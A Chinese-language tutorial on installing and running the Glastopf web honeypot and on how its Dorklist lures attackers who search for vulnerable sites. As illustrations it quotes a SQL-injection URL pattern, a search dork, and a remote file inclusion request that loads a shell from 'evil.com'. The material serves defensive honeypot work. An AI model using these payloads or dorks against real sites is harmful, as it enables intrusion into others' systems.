Glastopf蜜罐安装过程说明

　　安装Glastopf的过程非常简单，由于它是使用Python语言开发，能够在目前主流操作系统上运行，包括各种Linux发行版（Ubuntu、Debian、Centos）、Windows XP和Mac OSX等。下面在Linux发行版Ubuntu11.04上的安装过程进行具体介绍。

　　首先需要在命令行下运行：

　　sudo apt-get install python2.5 python-mysqldb subversion

　　Glastopf需要python2.5+的支持，目前主流Linux发行版都默认安装了Python，在我们实际的安装过程中，Ubuntu11.04安装的是Python2.7.1+，Glastopf可以正常运行。由于python3.X较python2.X变化较多，所以安装过程中不要选择Python3.X版本。

　　安装上述三个软件包后，通过Subversion 下载最新的Glastopf软件：

　　svn co svn://82.165.193.71:9090/Glastopf/branches/unstable Glastopf

　　下载完成后，会在下载目录看到名为Glastopf的文件目录，进入该目录后会看到webserver.py 主文件，在运行主文件之前，需要进入conf文件夹，对里面的glastopf.cfg等相关文件的配置参数进行修改，这里面需要修改的有Glastopf的IP地址，监听端口等；如果需要数据库支持，在安装数据库后，还应该在MySQL部分对MySQL的相关信息（IP地址、端口、用户名、密码、数据库名）进行修改。修改完成后，输入命令python webserver.py，Glastopf蜜罐软件便开始运行。

　　启动后，Glastopf会自动在80端口进行监听（默认是80端口，也可以在配置文件中修改成你想监听的端口），模拟Web相关服务对外来攻击进行交互。

　　当然仅启动Glastopf程序还是不够的，你还需要为蜜罐配置一个域名，并将域名提交给搜索引擎，这样才能更加有效地吸引使用Google Hacking等搜索引擎查找Web漏洞程序的攻击，每个搜索引擎都有域名提交的页面，供想要被检索的网站进行域名提交。笔者将域名提交到Bing和Google，并成功得到检索。Google最好在以下英文页面进行提交（笔者在谷歌中国提交的页面没有检索）：

　　https://www.google.com/webmasters/tools/submit-url?continue=http://www.google.com/addurl/&pli=1

　　提交的域名经过搜索引擎检索后，在搜索引擎中搜索提交的域名，就能够显示相应的信息（需要经过一段时间）。那么攻击者是如何找到域名进行攻击，以及蜜罐如何模拟Web应用从而捕获攻击者的数据，我们将在下一节详细介绍。

　　Glastopf蜜罐主要工作流程介绍

　　诱惑攻击者上钩的Dorklist

　　当前Web攻击寻找目标的一个重要方法便是利用Google Hacking技术，通过搜索引擎搜索存在弱点的网站。举一个简单的例子：著名的安全网站http:/ /packetstormsecurity.org每天都会公布互联网存在的漏洞，其中Web应用漏洞出现的频率很高，该网站在2011年7月16日公布了http://www.site.com//news_desc.php?Id=[Sqli]存在SQL注入漏洞，很明显news_desc.php?Id是该漏洞的关键字，黑客会利用该关键inurl：“news_desc.php”在搜索引擎中进行搜索，找到可能存在SQL注入的网站。

　　Glastopf软件作者Lukas在分析了黑客的行为之后，聪明地构造了Dorklist机制，并将其放置在Glastopf/res/目录下的index.html文件中，其中记录了最新的漏洞关键字。读者可能会想到，当前新漏洞每天都会出现，如何把最新的漏洞关键字加入到Dorkl ist 中是一个很关键的问题。这里，Lukas考虑到攻击者在找到蜜罐所在的域名后，会对各种漏洞均进行尝试，例如上面给出的例子中，攻击者在试验了SQL注入攻击后，还有可能去尝试类似http://example.com/hackme.php?color=http://evil.com/shell.php这样的远程文件包含漏洞，这样关键字hackme.php?color便会被记录下来，并添加到Dorklist中，实现Dorklist的动态更新，使得Glastopf能够对最新的Web攻击数据进行记录。

　　需要指出的是，目前Glastopf的实现中并没有对模拟的Web蜜罐系统做SEO(搜索引擎优化)来提高检索排名，但是从实际运行数据看，搜索结果并不影响蜜罐的实际工作，我们从2011年6月26日成功提交给Bing进行检索后，每天都会捕获大量攻击记录。